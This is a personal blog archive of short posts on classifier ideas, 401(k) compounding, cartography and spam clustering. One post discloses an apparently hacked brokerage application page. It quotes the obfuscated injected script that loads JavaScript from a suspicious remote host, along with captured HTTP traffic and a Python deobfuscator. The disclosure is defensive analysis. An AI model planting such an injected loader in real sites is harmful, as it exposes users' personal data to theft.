02.10.10
Posted in Blogroll, Ideas at 1:14 pm by Michael
The brain works in tandem with the body to ward off disease, with protections ranging from the sense of smell to sympathetic nausea. Chief among these is the “eww factor”: “gross” objects, behaviors, and sensations are the ones that signal conditions ripe for disease transmission.
Certain chronic disorders such as cyclic vomiting syndrome can result when these systems are engaged to an abnormal extent.
02.04.10
Posted in Programming at 11:42 pm by Michael
While signing up with Just2Trade, an online brokerage, I noticed that their site (which asks for a HUGE amount of personal data) had been hacked: the application page was pulling in a remote JavaScript file (yes, the application page, which asks you to enter enough data for someone to steal your identity twice over). I sent customer support the email below, but nearly a full business week has passed and the issue persists! Based on this, I would be EXTREMELY wary about trading with them or giving them any sort of personal data.
If this isn’t resolved in some way or another by next week I’ll post it to Digg, but for now I’ll give them a bit more time to get their act together:
“Dear Just2Trade Support,
This is bad. I don’t know how else to say it. Properly remedying this issue is going to take a lot of cleanup, both technical and business-wise. Here goes:
While completing your application, which asks for quite a bit of personal information (more than enough for someone to steal my identity with), I opened Firebug and noticed a suspicious HTTP request to the following URL:
http://google-com-sg.pcauto.com.cn.google-at.truesoulonline.ru:8080/miniclip.com/miniclip.com/ganji.com/google.com/cnn.com/
Investigating this more, I opened up Wireshark and captured the HTTP stream:
GET /miniclip.com/miniclip.com/ganji.com/google.com/cnn.com/ HTTP/1.1
Host: google-com-sg.pcauto.com.cn.google-at.truesoulonline.ru:8080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 31 Jan 2010 04:32:41 GMT
Content-Type: text/javascript
Connection: close
X-Powered-By: PHP/5.1.6
Expires: 0
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Length: 15
/* nothing */
Going back to Firebug to pinpoint the source of this request, I found that every one of the local JavaScript files on the application pages appears to have been compromised, since they all end with this string:
/*Exception*/ document.write('<script src='+'h(!t!)t#@p(&:(&$/!/@^g@)&(^o!@o^#g)@l^e#-&)c!#o$m&$(-@s@^#g@!!.&@p$c@#^a$@u!)(!!t$@&)#o&&.@$$!c#^)$o$^m^@&)(.&!@c@)@(n@^#.#^g!^o@&#@#o#)g$l@@&e&^-^)a!!!#t#&.&t@#r$&!)u!(e$(((s$)^#o$)u$)#l!#&o&)n(l^$i&n#$@!e())@.@#)^r&u!:&^8#0$(#^!8$$#0@&@(/#^m)$)i^n!$i&^@c^!l^i#)p##.))$c^$o$m)$/(^!m$i((n^^$i)@c()#!l$)$!i(^p^)&.^(c@$$@o&^m(/$@g!#$a!#@n&)^#j^^$i&(.!c!^^&o(&)m#&(@/(!g(&o(#$o^$@g&)((@l^e#&.!$$c^@$o$m!!)^/$!c&n#^@n^^.))c(o($&m&#!&/$#'.replace(/&|\$|\)|\!|#|\(|@|\^/ig, '')+' defer=defer></scr'+'ipt>');
(Which is writing out the reference to the script I mentioned above).
Now here’s the really disturbing thing: if you just go to the script (say sifr.js) directly in a browser, that code will not appear. The HTTP headers from an application page must be intact (and since mine contain personal data, I’m not posting them; fill out the application yourself and test it). At first I thought this might be some piece of malware on my own system, so I re-created those headers in wget just to be sure; the injected code still appeared.
This is *very* bad for two reasons:
First, it means your server has been compromised. Static JavaScript being written out could indicate a simple cross-site scripting scenario, but writing it out only when a specific HTTP header is present is something that can only be done with access to server-side code.
Second, contained within the HTTP headers sent to your script are all of the fields submitted with the form. Yes, this includes driver’s license #, bank account information, SSN, address, phone number, work address, title, email… far more than would be necessary to steal someone’s identity. The ability to read the headers and conditionally take some action indicates that whoever hacked the site can read all of the data submitted to it.”
The problem is not so much that the script is doing anything – right now it’s doing /* nothing */, though this could be changed on the remote end – but that it is only being output in response to the proper HTTP headers. And on the application page (the only page, in fact, where the headers are “proper”), these headers include a great deal of personal information. A server-side script which can include a string contingent upon these headers being there can also capture them directly.
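To make the obfuscation concrete, here is a minimal Python sketch of the same substitution the injected `.replace(...)` call performs: it strips the eight filler characters and leaves the URL behind. The function name `deobfuscate` and the constant `OBFUSCATED_PREFIX` are my own, and the constant holds only the first part of the payload quoted in the email (enough to recover the start of the hostname), not the whole string.

```python
import re

# Filler characters removed by the injected script's regex:
# & $ ) ! # ( @ ^
FILLER = re.compile(r"[&$)!#(@^]")

# Only the leading portion of the obfuscated string from the email,
# used here for illustration.
OBFUSCATED_PREFIX = (
    "h(!t!)t#@p(&:(&$/!/@^g@)&(^o!@o^#g)@l^e#-&)c!#o$m&$(-@s@^#g@!!"
    ".&@p$c@#^a$@u!)(!!t$@&)#o&&.@$$!c#^)$o$^m^@&)(.&!@c@)@(n"
)


def deobfuscate(payload):
    """Remove the filler characters, mirroring the JavaScript replace()."""
    return FILLER.sub("", payload)


if __name__ == "__main__":
    print(deobfuscate(OBFUSCATED_PREFIX))
```

Run against the full string, the same function should yield the URL that showed up in Firebug.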
01.26.10
Posted in Ideas, Mathematics at 12:28 am by Michael
This may give you a good idea of just how much you can expect out of that 401(k) contribution:
If you invest a recurring principal p every year into an account with an APY of (r-1)*100% (e.g. r=1.05 for a 5% APY), your balance after y years is: p * (r^(y+1) - r) / (r - 1).
(For y >= 1, since we’re starting at the first compounding).
So if you put $5k a year into a 401(k) with 3% interest, you’ll have $59,038 by the end of the 10th year, vs. the $50,000 you’d have without interest.
After 20 years, you’d have $138,382, vs $100,000.
If you contributed $10,000 per year for 20 years, you’d end up with $276,764, vs. $200,000.
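As a quick check on these figures, here is a small Python sketch of the closed-form formula next to a year-by-year simulation. The function names are mine, and the simulation assumes each deposit is made at the start of a year and compounds once at the end of that year, which is the reading that matches the formula.

```python
def future_value(p, r, y):
    """Closed form: p * (r^(y+1) - r) / (r - 1), for growth factor r != 1."""
    return p * (r ** (y + 1) - r) / (r - 1)


def future_value_by_loop(p, r, y):
    """Same quantity, built up one year at a time."""
    balance = 0.0
    for _ in range(y):
        # Deposit at the start of the year, then compound once.
        balance = (balance + p) * r
    return balance


if __name__ == "__main__":
    for p, y in [(5000, 10), (5000, 20), (10000, 20)]:
        print(p, y, int(future_value(p, 1.03, y)), p * y)
```

Truncated to whole dollars, the closed form reproduces the three figures quoted above, and the loop agrees with it to within floating-point error.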
Worth it? You decide. But that shocking “you’ll have a $500k nest egg after 30 years” claim, while true, is only true because it’s counting the principal you’re investing.
Granted, locking it away does remove the temptation to spend it.
01.12.10
Posted in Personal at 10:42 pm by Michael
Today marks the first time someone has applied for a job at an organization I have started.
01.09.10
Posted in Biology, Ideas, Research at 4:55 pm by Michael
Idea: a data classification metamodel based on the immune system: train a small bag of classifiers and clone the ones that perform well, but with a small chance of random mutations to the hyperparameters. Weight classifiers created in this manner exponentially based on iterations since last correct classification. Keep a “memory threshold” below which the weight will not fall in case that pattern is encountered again.
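A rough Python sketch of two pieces of this idea, under my own assumptions: the weight decays as exp(-decay_rate * iterations since the last correct classification) and is clamped at the memory threshold, and a clone perturbs each numeric hyperparameter by a small relative amount with some probability. All names and default values here are hypothetical, chosen only for illustration.

```python
import math
import random


def classifier_weight(iterations_since_correct, decay_rate=0.5,
                      memory_threshold=0.05):
    """Exponentially decaying weight that never drops below the memory floor."""
    decayed = math.exp(-decay_rate * iterations_since_correct)
    return max(memory_threshold, decayed)


def clone_with_mutation(hyperparams, mutation_chance=0.1, scale=0.2,
                        rng=random):
    """Copy a dict of numeric hyperparameters, occasionally perturbing a value."""
    clone = dict(hyperparams)
    for name, value in clone.items():
        if rng.random() < mutation_chance:
            # Relative perturbation of up to +/- scale (assumed mutation rule).
            clone[name] = value * (1 + rng.uniform(-scale, scale))
    return clone


if __name__ == "__main__":
    print([round(classifier_weight(i), 3) for i in range(8)])
    print(clone_with_mutation({"k": 5.0, "radius": 1.5}, mutation_chance=0.5))
```

Selecting which classifiers get cloned, and how the weights feed the final vote, is left out; those depend on the base classifiers being used.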
12.29.09
Posted in General at 12:10 am by Michael
Edge cities tend to spring up radially around larger population centers, leading to population distributions that tend to be proportional to the population in the host city and inversely proportional to the distance from it.
12.27.09
Posted in Ideas, Research at 10:00 pm by Michael
Decisions using the kNN framework are arrived at through a majority vote of an observation’s k nearest neighbors (given some distance metric). When aggregating many kNN decisions and weighing them against one much more important kNN decision, one strategy I’ve found to work well is to copy Congress:
The critical neighbor is “the President” and can’t “pass” the vote, but can “veto” it.
A decision is made to “pass” either on the vote of a majority of the neighbors in the absence of a veto, or given a 2/3 majority in its presence.
One example of this is aggregating decisions over a market index. Each individual asset in the index has an impact on the index’s overall movement, but the index itself (the President) can also be analyzed directly.
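The voting rule can be sketched in a few lines of Python. This assumes each ordinary kNN decision has already been reduced to a yes/no vote, that "majority" means strictly more than half, and that a "2/3 majority" means at least two thirds; the function name `passes` is my own.

```python
def passes(neighbor_votes, president_vetoes):
    """Return True if the aggregate decision is "pass".

    neighbor_votes: iterable of booleans, one per ordinary kNN decision.
    president_vetoes: True if the critical decision opposes passing.
    """
    votes = list(neighbor_votes)
    total = len(votes)
    if total == 0:
        return False  # the President cannot pass a vote alone
    yes = sum(1 for vote in votes if vote)
    if president_vetoes:
        # Overriding a veto needs at least two thirds in favor.
        return 3 * yes >= 2 * total
    # Without a veto, a simple majority is enough.
    return 2 * yes > total


if __name__ == "__main__":
    votes = [True, True, True, False, False]
    print(passes(votes, president_vetoes=False))
    print(passes(votes, president_vetoes=True))
```

In the market index example, each entry in `neighbor_votes` would be the kNN decision for one asset, and `president_vetoes` would come from the kNN decision made on the index itself.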
12.26.09
Posted in Philosophy at 8:35 pm by Michael
The root of this phenomenon is cultural, but in no small part it is perpetuated by the sheer number of hours that a job consumes. It crowds everything else out and both dichotomizes and quantizes the schedule: “weekday” vs. “weekend”, “work time” vs. “personal time”.
There’s little time to do anything beyond the job at that point. Choose carefully.
11.22.09
Posted in General, Ideas at 5:11 pm by Michael
The fundamental dilemma of cartography is attempting to project a 3-dimensional structure (the Earth) onto a 2-dimensional map. This is mathematically impossible to accomplish losslessly, so distortions are invariably introduced. Several standard projections exist, each with its own advantages and disadvantages, but one thing I’ve never seen is a context-aware projection: one which accepts more distortion in the least significant parts of the map (based directly upon the data being mapped) in exchange for minimizing distortion in the significant areas. Something like PCA.
11.11.09
Posted in Ideas, Research at 1:19 am by Michael
Many spam mails that land in my inbox tend to be thematically similar, though the messages have slight variations (perhaps they’re being sent by the same spammer). Ordinary messages do not cluster so well. Clusters formed on these spam messages should thus be “tighter” than clusters to which ordinary messages belong. Cluster membership and validity may thus be used as a feature in subsequent spam classification.
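One way to turn "tightness" into a number, sketched in Python: treat each message as a set of lowercase words and take the mean pairwise Jaccard distance within a cluster, so lower values mean a tighter cluster. The Jaccard measure, the whitespace tokenization, and the function names are my assumptions here; the clustering step itself is not shown.

```python
from itertools import combinations


def jaccard_distance(a, b):
    """1 - |a & b| / |a | b| for two sets of tokens."""
    union = a | b
    if not union:
        return 0.0
    return 1.0 - len(a & b) / len(union)


def mean_pairwise_distance(messages):
    """Average Jaccard distance over all pairs of messages in one cluster."""
    token_sets = [set(message.lower().split()) for message in messages]
    pairs = list(combinations(token_sets, 2))
    if not pairs:
        return 0.0
    return sum(jaccard_distance(a, b) for a, b in pairs) / len(pairs)


if __name__ == "__main__":
    spam_like = ["buy cheap pills now", "buy cheap pills today",
                 "buy cheap meds now"]
    ordinary = ["lunch at noon tomorrow?", "the quarterly report is attached",
                "can you review my patch"]
    print(mean_pairwise_distance(spam_like))
    print(mean_pairwise_distance(ordinary))
```

The resulting score for a message's cluster could then be passed to the spam classifier as one more feature alongside the usual ones.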